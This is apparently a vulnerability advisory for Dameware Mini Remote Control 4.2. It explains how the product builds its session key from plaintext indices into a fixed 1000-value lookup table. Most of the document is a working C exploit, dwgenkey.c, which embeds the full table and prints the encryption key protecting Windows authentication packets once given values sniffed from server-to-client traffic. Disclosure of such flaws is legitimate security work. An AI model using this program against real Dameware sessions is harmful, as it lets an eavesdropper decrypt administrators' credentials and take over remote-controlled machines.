Versions: Dameware Mini Remote Control Version 4.2
Vulnerability: The latest version of Dameware’s Mini Remote Control System uses a weak key agreement scheme. The scheme consists of the sharing of pointers into a fixed key lookup table. Both the client and the server have access to a key lookup table (KLT) consisting of 1000 32-bit values. Prior to encrypting traffic the server sends to the client a series of 32-bit integers, call it the key index table (KIT). For the sake of description lets call the indices klt_idx[4], an array of 4 32-bit integers. The klt_idx are set as follows:
klt_idx[0] = KIT[100];
klt_idx[1] = KIT[4];
klt_idx[2] = 42;
klt_idx[3] = KIT[37];
The actual session key is then constructed as 4 32-bit integers, sk[4] as follows.
sk[0] = KLT[klt_idx[0]];
sk[1] = KLT[klt_idx[1]];
sk[2] = KLT[klt_idx[2]];
sk[3] = KLT[klt_idx[3]];
This of course produces 0-bits of security.
They proceed to correct the Electronic Code Book mode of encrypting other authentication packets using the above constructed key using Blowfish in cipher block chaining mode with an IV = 0.
Exploit:
/*
dwgenkey.c dameware generate key program.
this function mimics the dameware
key generation algorithm used to
pass encrypted windows authentication
across between client and server
ax09001h@hotmail.com
*/
#include <stdio.h>
#include <stdlib.h>
unsigned int KLT [1000] =
{
0x75A50CF3, 0x58509D61, 0x2352671F, 0x1C8694B4, 0x464A5B8D, 0x17F76F5D,
0xF7CBFF22, 0xDEE4BBE7, 0x87C577D7, 0x7DE79418, 0x63099A11, 0x7FB4509,
0xF8AE103C, 0xB8956F47, 0xA788EF1E, 0xBC1B225E, 0x1F6F1B29, 0x48A20FA2,
0x73764E64, 0x9B1BAFE5, 0xC74859E3, 0xF34C3973, 0xD782E7EB, 0xBC2B83CD,
0x333141DD, 0x78F91C49, 0x8C3C3C62, 0x430F1CA6, 0xF55CB058, 0x5474C05,
0x2AD30B5F, 0x47B3AA97, 0xD1DE6ED1, 0x927DD4C0, 0x9043C47A, 0xCFA8D725,
0x8F2A794B, 0x916758FC, 0x5C21B4C0, 0xAF5D6F28, 0x2E5B2EE9, 0xA4772762,
0x5C35CBA8, 0x359EE4E1, 0xA778F423, 0xB4EB8D16, 0x846238D7, 0x9B9C7F88,
0x708517E4, 0x8346D4FA, 0xE131395B, 0xB95282FD, 0x5434DB89, 0x2B00247B,
0xAB5A14EC, 0x6A74879C, 0x1DF2EDE1, 0x9E9CBAD8, 0x6E4F97D5, 0x8910C7AE,
0x6C76CD48, 0x4C5C0FDE, 0x1C408E04, 0xB1DC5C7B, 0xB226FFC5, 0x5C1D1096,
0xA92D865A, 0x48D0FF4C, 0x87F9BF23, 0xF5E864C9, 0x80154A84, 0x38987089,
0xA4F0EE08, 0x1630ADB9, 0x99F564BD, 0x69394C04, 0xC790C3E5, 0xF0E9E87E,
0xB9F8AF1C, 0xF797E46C, 0x5F2F339D, 0xB792AB5F, 0x462050F7, 0xF922EDBD,
0xD8EC238B, 0xDE30DFB6, 0xCAE883E7, 0x77748FED, 0x681AB4C8, 0x1610F821,
0xAA69288, 0x88E41CCD, 0x81BEA8DB, 0x56236206, 0x3FF596A7, 0x7EB79B23,
0x2939A1A1, 0x59F56A53, 0x175ACD1D, 0x9D442B3E, 0xCB0D47E3, 0x81BD054E,
0xC5B5AED3, 0x420BFE41, 0xBA3446BE, 0x1F8AC66A, 0xB12D2A33, 0xD52EB9F3,
0xFD572127, 0x1ED5C98C, 0x891E0430, 0x263E5AC2, 0xFCEBC8D7, 0x84ACE5F7,
0x1093FA43, 0xFD07DD1D, 0xC4C91870, 0x1952527F, 0xF77D5A1B, 0xAA6E479B,
0x26BBC409, 0x1B694B08, 0xAB1246FB, 0x413D0BB5, 0xAC6A46C9, 0x79217008,
0x315A6C60, 0xA18609FB, 0x37C4221C, 0xD25D2622, 0x6CA0CC6F, 0x6E3A0EDC,
0x9EA7C082, 0x8F22351D, 0xC58AEC76, 0x8A59BFEF, 0x98C5888F, 0x5EA76365,
0x7E8B04D1, 0x44B5282D, 0x72547943, 0x6B49B88, 0xD8644EF3, 0x4DCA10BE,
0x6666892F, 0xAC773084, 0x85A718BE, 0x9C648D4A, 0x3D6787F1, 0xED2DB263,
0xCB0129DC, 0xAFB919E3, 0x2385872E, 0xE119C18F, 0x8F4ABB22, 0x7A153138,
0xF4537078, 0x7B535CE4, 0x17E50602, 0x86AF582E, 0xA96A418E, 0x2E464810,
0xEC0F2BF1, 0xD7500E84, 0xFB8248CB, 0xB6A0934D, 0x45A2F984, 0xDBB687C0,
0x4FADD405, 0x19E5677B, 0x327DAB10, 0x6E82DD9C, 0x28B99205, 0x627FB642,
0x13266166, 0xAC1D207E, 0x6757CB08, 0x75A551EE, 0xD8D440C7, 0xF9E198F7,
0xDCD6C5DD, 0x9E91F814, 0xD411C844, 0x7CD5073B, 0x711214E6, 0x419766DA,
0xE5209EFB, 0x1A4E0702, 0xD8B6C71, 0xDA3EAE89, 0xA1A00078, 0xB55B5C3E,
0xE8EB204C, 0x9092BCB5, 0x753F8AA, 0x25DBC9DC, 0x75855E4, 0x5486F63D,
0xE21C3971, 0x206B068A, 0xAEF41F63, 0xD6C45A84, 0x55CA81BF, 0x245EE02E,
0x20A277EC, 0x2688325E, 0x5CC597BC, 0xC3C6D5, 0xE10FA336, 0x1E038ED1,
0xD017BAA1, 0x60F3B322, 0x5C4B7883, 0x37C8827F, 0xA4401AB8, 0x3F0D1244,
0x599287A9, 0x9FEBF317, 0x551B9574, 0x7B4490D6, 0x5167A51E, 0x75144C86,
0xB58FA84E, 0xC2EFCD51, 0x62B1B44C, 0xF20CB94C, 0xFB1C3022, 0x5D9FA80E,
0x9723B02E, 0x9BEB9BC0, 0x7D7D7D7C, 0xBBECAC8, 0xEE7C8FD6, 0x84E7032B,
0x983051AE, 0x69E077E1, 0x4215FF00, 0x941F1398, 0x899CE29, 0x34FD70CC,
0x151A4D02, 0x625EFD60, 0xCC9FC987, 0x5854F10C, 0xFDE6B36A, 0xE50E1F0,
0x7D1AC470, 0x75CF6430, 0x691B188E, 0x861F8385, 0x899781B9, 0x453BBB9,
0x33CCF322, 0x5BC03054, 0x1C8F4BCE, 0xB20EAD6C, 0x8FC48E15, 0xC650FD0C,
0x5F9D8872, 0xD100E234, 0xCEBB178A, 0x20F2529F, 0x912889F8, 0x58EDD3F6,
0x27F8EADA, 0xE501536D, 0xB8635884, 0x5525004, 0x9B6EBF24, 0x4E223C61,
0x67C61B28, 0xBC8D0315, 0x186A6C99, 0xDAD6D525, 0x1C412AD1, 0x86B268E4,
0x47B5AC03, 0x72506EEA, 0xCDF419F9, 0x9E062DB4, 0x236F81F7, 0xCF4BFFDF,
0xF38B27B8, 0x17A2E942, 0xBDF70DFD, 0xB3ED596B, 0xD24583F5, 0x7D25304E,
0x209350C6, 0xD171038E, 0xA7F746D2, 0x4DD38415, 0x7F7FB4D9, 0x60F193B5,
0xAF480C11, 0x23E73939, 0x77853419, 0x835D55CE, 0xBCA629D0, 0xCDDA82C9,
0xC6EC6933, 0xFD779112, 0x3477605F, 0xD56B9610, 0xAAB266A6, 0xF53E8558,
0x61D7B1D6, 0x5C5ADCD4, 0x9C4C685B, 0x47D4C3FE, 0x956BB743, 0x7BEAB72C,
0xEE0CADD4, 0x844F5B3D, 0xF6B76242, 0x7A48638E, 0x7A9FCA83, 0x8C5CFCB8,
0xC5C0200F, 0x458E401B, 0xD0232077, 0x96EC41FB, 0x818E1178, 0xF039C809,
0xD2CBF2F3, 0xD710BBDF, 0xAF373B6F, 0xECFF5238, 0xA7A90C76, 0xB291F856,
0x76378535, 0x8AC59C93, 0xCC083868, 0x10B3DCBD, 0x726A72D1, 0xCAA8BABB,
0x9C519F9B, 0xE57B91C2, 0x3938CA06, 0x8AB0A001, 0x81154FB1, 0xB8B999D9,
0xB385C69F, 0xF62E1A24, 0xE352A419, 0x52719D67, 0x23D0D6E4, 0xD143E405,
0x17D114A3, 0x7A590816, 0x4FB4C683, 0x96DE0346, 0x1C96B2B3, 0xE0FE73B,
0x51FA1A82, 0xB5A325A9, 0x7244452E, 0x88411A62, 0x10F37E47, 0x80E9235D,
0x8734E043, 0x7287A203, 0x7D322B79, 0x59F16B1A, 0xB715C112, 0x7F930942,
0xE31AF1D4, 0xC8312072, 0xB949A15E, 0xE5A0942A, 0x21C62B9F, 0x3A8E4A04,
0xA7B50B0A, 0xC7481BF1, 0xF1E2DB36, 0x8120EAAB, 0x9364D482, 0x481D5B4D,
0x58460CE7, 0x6E1FE474, 0xCB180DE1, 0xF1FEA961, 0x6E663723, 0x7F713621,
0xC421154, 0x14B18B19, 0xEB87F422, 0xE2100D60, 0x65ACBC65, 0xC1EA51EA,
0x9DD0DF6A, 0x9AE68741, 0x1F5DEFA2, 0xA530969B, 0xB746D9D5, 0x1339A116,
0x7C07054, 0xE118D5CE, 0xF13EE7DA, 0xA53EBE1E, 0x3864BC9, 0x27C3B146,
0xF2057DFD, 0x5CDF8621, 0x24BBFA19, 0x9C207686, 0xFDA8C0B4, 0x7BC12DE,
0x3B6E6ABD, 0xEE88CB8E, 0xF11F5F31, 0x17C36F90, 0x62545D14, 0x23BAA683,
0xBCF05635, 0xEE710A20, 0x88D5C4C1, 0x45D242BC, 0x2618DAFA, 0x71C24008,
0xEFF1F3E8, 0x90537430, 0xF941923C, 0xE806B643, 0x1E8F4C81, 0x98E93630,
0x90ECFFE3, 0x422C75E1, 0xA19D77D3, 0x99D16114, 0xCA4380C8, 0xAF2A72E8,
0x71114704, 0x97EBE3E0, 0x90D614F6, 0xF5408B6D, 0x841EE866, 0x35699601,
0x9C004E8F, 0x5ACAC96F, 0xF1D181D3, 0xB1DB1F66, 0xAD36B6E6, 0xA3C182A3,
0x6E159D3A, 0x4860F191, 0xA22499C0, 0xA8DD59AB, 0x5E729975, 0x5285CEC2,
0xF0505102, 0x87294945, 0x17EE75CA, 0xD5E97597, 0xC36CD9A, 0xA45A497,
0xA1215DDF, 0x41C84062, 0xC1C6536E, 0xE8AEF5BF, 0xBF109C2E, 0x402A1D1C,
0x67DEDD8, 0x97061C4A, 0x936BACD0, 0xC34A5C19, 0xF40F90FE, 0xD7B03D1,
0xD7C91313, 0xE03CF91D, 0x7176F3D4, 0x29440055, 0xBBB3A31C, 0x70F5A3C2,
0x76E7D2A6, 0x536501F, 0xC77CA12B, 0x5E6E2842, 0x9896F26C, 0x2BC45D27,
0xE2FF89C7, 0x11FBC8C, 0x252652BD, 0x61AA26A4, 0xF3DF28A, 0xAFB90C39,
0x3C5BCF12, 0xE765B3A5, 0x6EBF07FE, 0x2630C3A2, 0xC0F995BC, 0x27677058,
0x49E5FA9C, 0x3B66C518, 0x7654283D, 0xB8305341, 0x72E94CF, 0x3E181088,
0x9F721122, 0xC536D545, 0x8BD48FE7, 0xA0899C0F, 0x950D4B9C, 0xCDFA8F86,
0x9D1180B5, 0xB35F2925, 0x85CA36ED, 0x9FA58055, 0xEF0F31F9, 0xA5FADD9C,
0x2ABB9F51, 0xC90E060A, 0xA0304ED8, 0xB6462678, 0x5ECAB5CB, 0x9BFA4C0C,
0x1644830E, 0xC210F8D0, 0x3139A59B, 0xDE090D20, 0x89960C79, 0x489E6E7D,
0xC3650D3F, 0x832E301C, 0x3EC2DEC2, 0x8C1BEFD2, 0x15374CE3, 0xA95682A4,
0x694B8053, 0x8C003F9E, 0x3C792799, 0xC31B2A4B, 0xFD6F5781, 0x544F000B,
0x151F60A6, 0x224E32E5, 0x9AD498E6, 0x8B74BFCC, 0x85C8C5DA, 0x221D7990,
0x66C4A629, 0x1281D60A, 0xE0178028, 0x44E6DEBD, 0xBAAB265, 0x384C4B56,
0xDC2F9A2C, 0x470211A4, 0xCBD167C3, 0xF5EED383, 0x1E1ED189, 0x29D803F9,
0xC144F12E, 0x9AC2B5AB, 0xC3DB04A2, 0xC513EB91, 0x71DCF85C, 0x343B65E3,
0x6B32E419, 0xAFFC770D, 0xBCE86B4D, 0x9AA723E4, 0x611A0E70, 0xFA441603,
0x3171887D, 0x5AC8ABCD, 0x45A5A2E4, 0xA47AFB05, 0xF1FBA2F1, 0x1F7FA634,
0x95F72F6A, 0x17E27035, 0xC91082D7, 0x5F2BEE2F, 0x68EE3EA8, 0xD2238F52,
0xD622F757, 0x2CE5FE15, 0x4DD2E862, 0xD8B78679, 0xA068E1E3, 0x9DA3764,
0xA46DC043, 0xEF5A319E, 0x3CA47D7, 0x15D66FBD, 0x70FD11C5, 0xEB93FAE7,
0xE0C76863, 0xCA8DB56B, 0x549B7A6D, 0x7830B60E, 0x63EC6EA1, 0xC5F8C700,
0x25F6631D, 0x81C74AA6, 0x1FEBAAA6, 0x50FACED0, 0xF3B16C0C, 0x42D24E7D,
0x87FAB7B4, 0x8998222D, 0xCF13B716, 0xD77799C7, 0xF19B6249, 0xCC56A6E6,
0x3D87AC7E, 0x2A73259B, 0x5503BDFD, 0xD95F05F1, 0xC01BCD8B, 0x6F9C96E2,
0x6B2D997, 0xB3F54B81, 0x3139AC71, 0x504DC220, 0x9D4C8848, 0xFAB47FBF,
0xF910278A, 0x1AAD13D7, 0x667DC201, 0x2A2AE786, 0x845C31FA, 0x27F4E75,
0x413D1796, 0x9236D7BC, 0x8FAC3425, 0x866DC291, 0x97796BE4, 0x3581CDF,
0xA313B372, 0x57907BA0, 0x981BE778, 0x67DA3DF6, 0x947D9EC1, 0xCFA65CA6,
0x6261BF74, 0xD818DCB0, 0x30CBA2D1, 0x1A41B299, 0x33317112, 0x424A6EB6,
0x516FA0C5, 0x1B0EBEDC, 0xDDAB9664, 0xCBDE0912, 0x8E567CFA, 0xA1C9DAEB,
0x1C7DB358, 0xA144F1FE, 0x2B7FEE15, 0xB5CA6B77, 0x2B1655B3, 0xFF3D846B,
0x2B0B907A, 0xC0948E5C, 0x608A1725, 0x2FF6781C, 0x555C1AAC, 0xDB70AD3E,
0xDFD488CA, 0x2170C025, 0x576C15E7, 0x5F447947, 0x30B8108F, 0xBB9ADE84,
0x8808C71A, 0xB760EA1F, 0x4E503018, 0x534BA5B5, 0xCDF5FE07, 0xEC48167F,
0xD1E7227A, 0xCD998A1, 0xE754F192, 0x2727BFFF, 0xBFB0694D, 0xF454B618,
0x63EBFF6, 0x30BD09D0, 0x927F98B2, 0x6F96ED41, 0xC249BFB1, 0x8E07ED96,
0x6D3B63AE, 0xC661C79A, 0x574D1947, 0x691AC06A, 0x1241A695, 0xDA814574,
0xF520C090, 0x7AAFF6DF, 0x6314F55A, 0x99BF992E, 0x4C2350AA, 0x16C970F2,
0xBC5DAF3D, 0x948FEE79, 0xCF038D84, 0x94916A6F, 0x67C9C446, 0x769D41FC,
0x7AB8FC6B, 0xAC88CDC6, 0x2632E0F2, 0x7A39D045, 0xE07D60C3, 0x627F0F1B,
0x6C9E9B6F, 0x5443B96A, 0xB42AEFB6, 0x7D971F39, 0x1E543216, 0xAB1F0A,
0x4B0E8966, 0xBE389C53, 0xE8143B78, 0x845EEA38, 0x1BC4E0C1, 0xC33854ED,
0xEBE30DBC, 0xAE0FFAD8, 0x545B28DB, 0x64CB5928, 0x516227C9, 0xDA7DED1B,
0x60957017, 0xEF42F6C4, 0xD1D44B1A, 0x6E9DCDB0, 0x8089B1C8, 0x78229E35,
0xE65C19DF, 0xBE4926F8, 0x22F282DB, 0x1DAD0725, 0x1F1E94A5, 0xE1F97ACD,
0x7EA0006F, 0x94F6FBDD, 0x26214BED, 0xFC7FF0CC, 0xA2393542, 0xB472E61E,
0x301E470, 0x36FD7EE5, 0xF179CB04, 0x18CC9785, 0x2E0F60B2, 0x13112B9B,
0x21CE96F9, 0xCF50766C, 0x420F7FBE, 0x3062489, 0xA2E5956D, 0x38AF92C9,
0x826DB438, 0xCA1D08C7, 0x2CAA1940, 0xCCCDF1C, 0x9C3FE51D, 0x1ECDC7D8,
0x909C80DE, 0x646BFFA9, 0x6318213D, 0x32C14EFF, 0xC8351460, 0x6D81B09,
0xC3BA2047, 0x4078D5B1, 0x7AF40C50, 0x7128296, 0xB57DE4BE, 0xBD35598,
0x2256C607, 0xB6177952, 0xF276EF63, 0x55D787AF, 0x2267BE3B, 0x48B1B069,
0x5CF704D4, 0x4C1B3376, 0xDF687016, 0x68B38FE2, 0x19E808B4, 0x2FFF302B,
0x78BD0181, 0xBC4A03F0, 0x98562262, 0xB9797F02, 0x1E7B17D3, 0x61B031D1,
0x8E69A1F8, 0x32863D7E, 0x8140AA57, 0xD42FB27E, 0x825645B2, 0x7E0AC685,
0x1752B306, 0xEF07F2F7, 0xF031981C, 0xA061064D, 0xE118F8AB, 0xCCE37EF9,
0x6AEBFCF7, 0xEEED8568, 0x98A86406, 0x6B7D3AAA, 0xAD068483, 0x2E71AAF2,
0x1800DB2E, 0xA98F5949, 0xE111A890, 0x17E02EB3, 0xC6B72970, 0x15067E3E,
0xB2291D61, 0x6008098F, 0xDAD360FF, 0xD19E95D, 0xBEFD0EC7, 0x5F4C9183,
0xCB5EAB77, 0xC6A1FB76, 0xD71F95D2, 0xFC7FDB6E, 0x80DD91AB, 0x8E322B21,
0xAAE68069, 0xC2CEB8A5, 0xC89D1CA1, 0x931577D8, 0x4D6F1725, 0xC3E0EC5A,
0x7F94E8FB, 0x3E008B9C, 0x1DC1680D, 0xF99F3782, 0xFD54CD8F, 0x97722074,
0xE0F06DB7, 0xF9B44EE8, 0xFBF70D53, 0xDF3B605F, 0xB6CDC64D, 0xD5CC9449,
0x75A2DC1A, 0x62C4D3AE, 0x6FB02ED3, 0x55F97BF8, 0x86179194, 0x67488E2,
0x1071C487, 0x5D196F3C, 0x9FCDBA5E, 0x994036B, 0x538C2B87, 0xE3CA84F4,
0xE6D29642, 0xAA8E0B45, 0xF3557176, 0x403E0041, 0xF1056A7D, 0xB163CC68,
0xB00F9A47, 0x6E13B87, 0x93C25E4F, 0x4BFCEC42, 0xD4AAE81, 0x9FA016C,
0x8A842986, 0xDC301A3B, 0xA43D96F1, 0x1DFB9302, 0x4D9F9AAE, 0x6A7416FF,
0xCF2E7C59, 0x76478C25, 0xAD4A317E, 0x8985000D, 0x38FED22B, 0xFD0944A9,
0xD2A319D1, 0x9D9ABC55, 0x2A1F76B0, 0x9BCDAA0D, 0x2DE5847, 0xDF44583C,
0xF4CEBE0F, 0x6733F2CD, 0x5F8A8DA5, 0x4526D975, 0xB6E458B7, 0x4D2BB1A6,
0x137AA2C6, 0x6DDCFC23, 0xA41CE8B6, 0x4A442E7E, 0xFB7A0A5, 0xF7808F43,
0x5D10DDD6, 0xA52D6396, 0x61574048, 0x8923CBA2, 0x6436DD12, 0x49266343,
0xF1787AAB, 0xC467FB1A, 0x25278A4B, 0x2181A43C, 0xC4EAF160, 0x88A9E6BB,
0xC7AF0933, 0x8002BA84, 0xB134654, 0x4A015A8E, 0xEC16E6AF, 0xEC154BE3,
0x10FE786A, 0x8F5EA3E7, 0x1A92D7C4, 0xD90FE65A, 0x6CF77EA3, 0x394EB8F9,
0x573B2AF9, 0xD6396AFA, 0xCC79F56, 0xC36AA7DB, 0x88B6126E, 0x3BBD5F44,
0xA8086DC7, 0x9437E86F, 0xA8A72E5F, 0x204CC584, 0x508AAC96, 0xEACC6EF1,
0x981E7A1A, 0xA16DF863, 0xAA9FD0B9, 0x22F6D8DA, 0xA05A7581, 0xD9782911,
0xCCBDFFD7, 0x7E3C9F4E, 0x96FC6F3D, 0x7113F1FC, 0xD312E7BD, 0x6AD91B0F,
0x394E21FA, 0x47F135EE, 0xA24E4FE5, 0x2C7A682E, 0x185161A9, 0x6AF00259,
0xD411424D, 0xB207A9E1, 0xF4E482E7, 0x6173F9FE, 0xE3CEC249, 0xB63D392B,
0x3FE5BEDF, 0x82C2E736, 0x69FF3BA2, 0x9D219633, 0x8DA0F96F, 0xDFCCCB9,
0xC4A6A06F, 0xBC536DF7, 0xE76CC1F, 0x452F4BD1, 0x1BC9BA19, 0x4427617C,
0x4410511D, 0xD2B3643B, 0x90066BE6, 0x9B03705C, 0xF144AE, 0x5017F6E5,
0x2EC8DA0, 0xC4733AAE, 0xD2CB991D, 0xFF695547, 0xE662D331, 0xA374917C,
0xB53B62CC, 0xBF135D1, 0x3240CEBA, 0xB406298B, 0x5065FE42, 0x9BB538CC,
0xC89AF46A, 0x97FB692D, 0xB0123130, 0xED5BFFB1, 0x2CC09D9, 0x68E4E060,
0xB117D6E7, 0xBA9CE7B3, 0xB731559B, 0x876FF1D
};
int usage()
{
printf("USAGE: dwkeygen INDEX0 INDEX1 INDEX2\n");
printf("\t INDEX0 is the hexidecimal value of 101st unsigned int\n");
printf("\t in the server to client message that preceeds\n");
printf("\t the encrypted windows authentication packets\n");
printf("\t INDEX1 is the hexidecimal value of 5th unsigned int\n");
printf("\t in the server to client message that preceeds\n");
printf("\t the encrypted windows authentication packets\n");
printf("\t INDEX2 is the hexidecimal value of 38th unsigned int\n");
printf("\t in the server to client message that preceeds\n");
printf("\t the encrypted windows authentication packets\n");
printf("OUTPUT: dameware encryption key\n");
return 0;
}
int main(int argc, char **argv)
{
int i;
unsigned int sk[4], klt_idx[4];
if(argc!=4) { return usage(); }
klt_idx[0] = strtol(argv[1], NULL, 16);
klt_idx[1] = strtol(argv[2], NULL, 16);
klt_idx[2] = 42;
klt_idx[3] = strtol(argv[3], NULL, 16);
for(i=0;i<4;i++){
sk[i] = KLT[klt_idx[i]];
printf("%08X ", sk[i]);
}
printf("\n");
return 0;
}
|
